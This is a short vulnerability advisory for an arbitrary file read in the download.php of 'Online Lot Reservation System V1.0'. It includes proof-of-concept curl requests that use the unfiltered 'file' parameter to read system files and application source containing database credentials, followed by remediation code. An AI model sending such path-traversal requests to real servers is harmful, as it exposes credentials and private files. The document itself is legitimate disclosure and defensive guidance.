# Vulnerability Summary: Arbitrary File Reading in Online Lot Reservation System V1.0 ## Vulnerability Overview * **Project Name**: Online Lot Reservation System V1.0 * **Vulnerable File**: `download.php` * **Vulnerability Type**: Arbitrary File Reading * **Cause**: The `file` parameter in `download.php` is not filtered or validated before being passed directly to the `readfile()` function. Attackers can read any file on the server via path traversal or absolute paths. ## Impact Scope * Attackers can exploit this vulnerability without authentication or authorization. * Any file on the server can be read, including: * Database configuration files (potentially exposing database credentials). * Sensitive system files (e.g., `/etc/passwd`, `C:\Windows\system32\drivers\etc\hosts`). * Application source code and other sensitive information. ## Proof of Concept (PoC) ```bash # Read Windows System Files curl "http://127.0.0.1:7777/onlinelot/download.php?file=C:\Windows\win.ini" # Read the hosts file curl "http://127.0.0.1:7777/onlinelot/download.php?file=C:\Windows\System32\drivers\etc\hosts" # Read database configuration curl "http://127.0.0.1:7777/onlinelot/download.php?file=./index.php" ``` ## Remediation 1. **Whitelist Validation**: ```php $allowed_dir = __DIR__ . '/downloads/'; $real_path = realpath($allowed_dir . $file); if (strpos($real_path, $allowed_dir) !== 0) { die('Invalid file path'); } ``` 2. **Path Traversal Protection**: Use `basename()` to strip directory components from the path, preventing `../` attacks. 3. **File Type Restrictions**: Only allow reading specific file types (e.g., documents and images). 4. **Disable Directory Listing**: Ensure server configuration prohibits directory traversal and directory listing.